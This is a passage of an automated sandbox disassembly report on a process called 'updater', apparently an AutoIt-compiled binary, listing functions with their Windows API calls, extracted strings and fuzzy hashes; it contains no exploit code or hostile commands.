API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: cc6c23d90620a6402860bd15ae5bea327facabca71e012be45e32a83b913380d
Instruction ID: 62a6d272d8ad6366772f712b28f96b5539e9b828494aabf4396b3a4f084693f1
Opcode Fuzzy Hash: cc6c23d90620a6402860bd15ae5bea327facabca71e012be45e32a83b913380d
Instruction Fuzzy Hash: D051DE3090478869FB3AD7B484547EABFB49F02380F09C59DD5C95B1C3DAAC9A4CCB92

Function 0036CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0036CE1C
GetWindowRect.USER32(00000000,?), ref: 0036CE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0036CE8C
GetDlgItem.USER32(?,00000002), ref: 0036CE97
GetWindowRect.USER32(00000000,?), ref: 0036CEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0036CEFD
GetDlgItem.USER32(?,000003E9), ref: 0036CF0B
GetWindowRect.USER32(00000000,?), ref: 0036CF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0036CF5F
GetDlgItem.USER32(?,000003EA), ref: 0036CF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0036CF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 0036CF97

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 953353c1c1e4edd304f339b3db5f1656eddf8d915c0c095af75c2275e4ac42d0
Instruction ID: 754121fc2d54da44360d75dd2bdbd46a6a3017faf579e9865e3b8c7e0783ffad
Opcode Fuzzy Hash: 953353c1c1e4edd304f339b3db5f1656eddf8d915c0c095af75c2275e4ac42d0
Instruction Fuzzy Hash: 92518F71B10205AFDB19CFA8CD89ABEBBBAEB88311F14812DF516D7294D770AD008B50

Function 00312581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 003129AB: GetWindowLongW.USER32(?,000000EB), ref: 003129BC

GetSysColor.USER32(0000000F), ref: 003125AF

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 5ea5155ba7cc4c511fd03ef02c6cc5091dd599f1aa3d9b52ffdfddbe90211ad8
Instruction ID: acc7cb4f17494aef5d081d6e290870575b3de42398737f347cd7787792a78f62
Opcode Fuzzy Hash: 5ea5155ba7cc4c511fd03ef02c6cc5091dd599f1aa3d9b52ffdfddbe90211ad8
Instruction Fuzzy Hash: 6541C531104144AFDB2B5F28AC88BFA376AEB0E331F164261FD658E1E1D7B08C91DB25

Function 003229BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00330B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00322A3E,?,00008000), ref: 00330BA7

Part of subcall function 00330284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00322A58,?,00008000), ref: 003302A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00322ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00322C2C

Part of subcall function 00323EBE: _wcscpy.LIBCMT ref: 00323EF6

Part of subcall function 0033386D: _iswctype.LIBCMT ref: 00333875

Strings

Error opening the file, xrefs: 0035FD33, 0035FDAA
Bad directive syntax error, xrefs: 0036008F
Unterminated string, xrefs: 003600D6
EA06, xrefs: 0035FD48
AU3!, xrefs: 00322A93
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0035FD17

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: 95ce8484d764c47fc8c679e8c0773dbcf11abca4b8e9c94c368ecc8326bea2e2
Instruction ID: 35fbcf9a633626fd32e5aa7e36345ba22c6b77bb740f129dc78e31d4e0574b17
Opcode Fuzzy Hash: 95ce8484d764c47fc8c679e8c0773dbcf11abca4b8e9c94c368ecc8326bea2e2
Instruction Fuzzy Hash: DD02B2701083519FC726EF24D881EAFBBE5EF95314F10491DF8999B2A2DB30DA49CB42

Function 00314D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00314D62
__swprintf.LIBCMT ref: 00314DAC
__i64tow.LIBCMT ref: 0034DB3B

Strings

0x%p, xrefs: 0034DB1D
False, xrefs: 0034DB03
%.15g, xrefs: 00314DA6
True, xrefs: 0034DAFC

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 142adab0a4a46d1df98475d5a665cb90bd2c956b3156ddee80a2c1c74202ffe4
Instruction ID: 2fb86e0b09a9efac95465e65f3f6ce58ea5215a99a2cf164aa9830f78327d500
Opcode Fuzzy Hash: 142adab0a4a46d1df98475d5a665cb90bd2c956b3156ddee80a2c1c74202ffe4
Instruction Fuzzy Hash: B541BB715042059FDF3AEF74D982EBA73E8EF49300F24445EE549DF292EA71A941C711

Function 00397777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0039778F
CreateMenu.USER32 ref: 003977AA
SetMenu.USER32(?,00000000), ref: 003977B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00397846
IsMenu.USER32(?), ref: 0039785C
CreatePopupMenu.USER32 ref: 00397866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00397893
DrawMenuBar.USER32 ref: 0039789B

Strings

F, xrefs: 00397887
0, xrefs: 00397785

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 725b7c5cde01e42607e77c727840800bde8676fca1189282ba7949fb08e61f4d
Instruction ID: 6bc9020a0a0d3eeaba13853d9d301692301bf7f25f1f8a1a7d7ecd9e54d6f1ab
Opcode Fuzzy Hash: 725b7c5cde01e42607e77c727840800bde8676fca1189282ba7949fb08e61f4d
Instruction Fuzzy Hash: C2417C74A14209EFDF16DF64D889AAA7BF9FF4A310F154429F905A73A0D730A910DF50

Function 00337030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0033706B

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

__gmtime64_s.LIBCMT ref: 00337104
__gmtime64_s.LIBCMT ref: 0033713A
__gmtime64_s.LIBCMT ref: 00337157
__allrem.LIBCMT ref: 003371AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003371C9
__allrem.LIBCMT ref: 003371E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003371FE
__allrem.LIBCMT ref: 00337215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00337233
__invoke_watson.LIBCMT ref: 003372A4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: af9a0b020bc7c5cb100549819213dbb7a8d9100d0e694e8a29e902c756338f6d
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: BE71F6B2A04707ABD7269E79CCC1B5AB3E8AF11360F15463AF914EB681E770ED408790

Function 00372CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00372CE9
GetMenuItemInfoW.USER32(003D7890,000000FF,00000000,00000030), ref: 00372D4A
SetMenuItemInfoW.USER32(003D7890,00000004,00000000,00000030), ref: 00372D80
Sleep.KERNEL32(000001F4), ref: 00372D92
GetMenuItemCount.USER32(?), ref: 00372DD6
GetMenuItemID.USER32(?,00000000), ref: 00372DF2
GetMenuItemID.USER32(?,-00000001), ref: 00372E1C
GetMenuItemID.USER32(?,?), ref: 00372E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00372EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00372EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00372EDC

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: d0fc7047cd73bbece87e6c4121bf899744ef9a6d7080e372f28407b8e5060bce
Instruction ID: 70f5d7b1a2258eeb601175fc3736c4260348a7f767560e3dda60022bd5e0822e
Opcode Fuzzy Hash: d0fc7047cd73bbece87e6c4121bf899744ef9a6d7080e372f28407b8e5060bce
Instruction Fuzzy Hash: C861BE70900249AFDB36CF64DC88ABFBBBCEB02304F158459F859A7651D739AD05DB20

Function 00397548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003975CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003975CD
GetWindowLongW.USER32(?,000000F0), ref: 003975F1
_memset.LIBCMT ref: 00397602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00397614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0039768C

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 1c16e0b4fd086b457dd61c24b22c2f8b5849fccc87a357268bed24095f8804d9
Instruction ID: 2ee339f109ebdb3a135779d69c530a3ae6b587e34fbbfa084c1f0ee66344b672
Opcode Fuzzy Hash: 1c16e0b4fd086b457dd61c24b22c2f8b5849fccc87a357268bed24095f8804d9
Instruction Fuzzy Hash: F4616F75904208AFDB12DFA4DC85EEE77F8EB49710F100156FA15AB2E1D770AE41DB50

Function 003677B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003677DD
SafeArrayAllocData.OLEAUT32(?), ref: 00367836
VariantInit.OLEAUT32(?), ref: 00367848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00367868
VariantCopy.OLEAUT32(?,?), ref: 003678BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 003678CF
VariantClear.OLEAUT32(?), ref: 003678E4
SafeArrayDestroyData.OLEAUT32(?), ref: 003678F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003678FA
VariantClear.OLEAUT32(?), ref: 0036790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00367917

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 192f3306e4f12b0301b426469495c14c1350c1b62abc49acbd1d7bca0450cde1
Instruction ID: d5f6783ce0d530a945379bb40b71c4e584baafe6fe141e0bd6b9bc8c5a12144c
Opcode Fuzzy Hash: 192f3306e4f12b0301b426469495c14c1350c1b62abc49acbd1d7bca0450cde1
Instruction Fuzzy Hash: AE415135A042199FCB06DFA5D8489EDBBB9FF4D344F40C069E955AB261CB30AD45CF90

Function 00388AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

CoInitialize.OLE32 ref: 00388AED
CoUninitialize.OLE32 ref: 00388AF8
CoCreateInstance.OLE32(?,00000000,00000017,003A3BBC,?), ref: 00388B58
IIDFromString.OLE32(?,?), ref: 00388BCB
VariantInit.OLEAUT32(?), ref: 00388C65
VariantClear.OLEAUT32(?), ref: 00388CC6

Strings

Failed to create object, xrefs: 00388B63, 00388C19
NULL Pointer assignment, xrefs: 00388B9D
Invalid parameter, xrefs: 00388BE4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 2e9b7ed643236c7189e05e725c4a12803cab9fba00a609ea7eb734dc50d19872
Instruction ID: 3155ced8fecdd9f76cddd33b049412373328785c46ed1da9f1ae174c9ea084bb
Opcode Fuzzy Hash: 2e9b7ed643236c7189e05e725c4a12803cab9fba00a609ea7eb734dc50d19872
Instruction Fuzzy Hash: B161B0702087019FC716EF64C885F6AF7E8AF89714F50488DF5859B291DB74ED48CBA2

Function 003734DD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0037357C

Strings

,z=0z=, xrefs: 0037350F
blank, xrefs: 003734FE
info, xrefs: 0037351D
question, xrefs: 00373535
warning, xrefs: 00373565
stop, xrefs: 0037354D
,z=0z=, xrefs: 0037358D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: IconLoad
String ID: ,z=0z=$,z=0z=$blank$info$question$stop$warning
API String ID: 2457776203-1050991176
Opcode ID: 0573be7a0c8ff590aee88871506c7bc7f66c5f224b4baed5a551d477cd9f4afd
Instruction ID: 69aef92e82e511ebdaffc141e91253f79af9735826f269113660e8ed451de9ba
Opcode Fuzzy Hash: 0573be7a0c8ff590aee88871506c7bc7f66c5f224b4baed5a551d477cd9f4afd
Instruction Fuzzy Hash: 2211057164C346BAE7275A14DCC2DAA779CDF17770F20802EFA08EA181E7686F4067A0

Function 00388F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00388FC1
CoInitialize.OLE32(00000000), ref: 00388FEE
CoUninitialize.OLE32 ref: 00388FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 003890F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00389225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003A3BDC), ref: 00389259
CoGetObject.OLE32(?,00000000,003A3BDC,?), ref: 0038927C
SetErrorMode.KERNEL32(00000000), ref: 0038928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0038930F
VariantClear.OLEAUT32(?), ref: 0038931F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 9cc2a058245fb978f4bccf95c96a92a51cb8ded861e29b284c4b6973602696be
Instruction ID: 3c61ad5a02ab1b073ff4e53882053b437f9ffce535fafa3073af4ab3c9d9b8e5
Opcode Fuzzy Hash: 9cc2a058245fb978f4bccf95c96a92a51cb8ded861e29b284c4b6973602696be
Instruction Fuzzy Hash: 5EC146B1208305AFC706EF64C884A6BB7E9FF89348F04495DF98A9B251DB71ED05CB52

Function 003719CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 003719EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00370A67,?,00000001), ref: 00371A03
GetWindowThreadProcessId.USER32(00000000), ref: 00371A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370A67,?,00000001), ref: 00371A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00371A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370A67,?,00000001), ref: 00371A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370A67,?,00000001), ref: 00371A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00370A67,?,00000001), ref: 00371A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00370A67,?,00000001), ref: 00371AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00370A67,?,00000001), ref: 00371ABB

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 6944ed509b7ec407d29859d3bd42f39893a19bfa72c0a955707d3dec948384f7
Instruction ID: 3c607060c6833b409eabc9e0659d6697c46b8907739f8cac2e16ac2ee3044d0a
Opcode Fuzzy Hash: 6944ed509b7ec407d29859d3bd42f39893a19bfa72c0a955707d3dec948384f7
Instruction Fuzzy Hash: 0931E172512204AFDB779F18EC44FAA37AEEB65319F128116F808C61A0DBB8AD508F50

Function 0034C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0031260D
SetTextColor.GDI32(?,000000FF), ref: 00312617
SetBkMode.GDI32(?,00000001), ref: 0031262C
GetStockObject.GDI32(00000005), ref: 00312634
GetClientRect.USER32(?), ref: 0034C0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 0034C113
GetWindowDC.USER32(?), ref: 0034C11F
GetPixel.GDI32(00000000,?,?), ref: 0034C12E
ReleaseDC.USER32(?,00000000), ref: 0034C140
GetSysColor.USER32(00000005), ref: 0034C15E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: c730c4a237bda0ed9384a8b98d8fa1784462aade84bb1667633ac909e49395a4
Instruction ID: b8113aababfa3c7702e4a9ae2db259a49271b391728dba9962ee727afa57a92d
Opcode Fuzzy Hash: c730c4a237bda0ed9384a8b98d8fa1784462aade84bb1667633ac909e49395a4
Instruction Fuzzy Hash: 1B118B31505204BFDB6B5FB4EC48BEA7BBAEB0A321F104225FA65950F1CB7119A1EF11

Function 0031AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0031ADE1
OleUninitialize.OLE32(?,00000000), ref: 0031AE80
UnregisterHotKey.USER32(?), ref: 0031AFD7
DestroyWindow.USER32(?), ref: 00352F64
FreeLibrary.KERNEL32(?), ref: 00352FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00352FF6

Strings

close all, xrefs: 0031ADDC

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 6344ca0a7ae262a5bcf49b42fd5f4bdfbba878d28c6ce87a00f885a9e8136048
Instruction ID: b90a9c491c380df7b8d063eb0680fe516770b8334d1c6d293caeeadf3791b9e4
